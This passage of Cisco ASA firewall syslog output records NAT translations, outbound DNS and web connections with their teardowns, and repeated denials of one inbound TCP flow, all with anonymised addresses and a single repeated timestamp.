for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 
11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299
